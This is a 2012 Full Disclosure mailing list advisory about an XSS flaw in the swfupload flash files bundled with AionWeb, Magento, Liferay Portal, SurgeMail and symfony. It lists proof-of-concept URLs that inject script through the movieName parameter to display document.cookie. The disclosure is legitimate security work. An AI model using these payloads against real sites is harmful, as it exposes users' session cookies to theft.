Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

XSS vulnerability in web applications with swfupload: AionWeb, Magento, Liferay Portal, SurgeMail, symfony
From: "MustLive" <mustlive () websecurity com ua>
Date: Thu, 15 Nov 2012 22:01:00 +0200

Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in Dotclear, XenForo,
InstantCMS, AionWeb, Dolphin and that this hole is available in many other
web applications.

In previous letter I've wrote concerning web applications with swfupload.swf
(which is for Flash Player 10). And now I'll write about web applications
with swfupload_f9.swf (which is for Flash Player 9). Here is information
about AionWeb, Magento, Liferay Portal (Community Edition and Enterprise
Edition), SurgeMail, symfony - among multiple web applications which are
bundled with swfupload_f9.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of AionWeb, Magento, Liferay Portal
(Community Edition and Enterprise Edition), SurgeMail, symfony. There is no
information that they have fixed this vulnerability in their software (at
that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload. But in WordPress and XenForo the swfupload.swf was
fixed, not swfupload_f9.swf and these are different versions of the same
flash application (designed for different versions of Flash Player). Taking
into account current wide spreading of Flash Player 10.x and 11.x, then
developers of these web applications could replace swfupload_f9.swf with new
fixed version of Swfupload.

----------
Details:
----------

XSS (WASC-08):

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/engine/classes/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb contains both versions of flash application (and also version for
Flash Player 8, about which I'll write in the next letter).

Magento:

http://site/cms/themes/cp_themes/default/images/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail contains both versions of flash application (and also version for
Flash Player 8, about which I'll write in the next letter).

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb, Liferay Portal, SurgeMail and symfony contain different versions of
flash application, about which I'll write in the next letter.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • XSS vulnerability in web applications with swfupload: AionWeb, Magento, Liferay Portal, SurgeMail, symfony MustLive (Nov 15)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault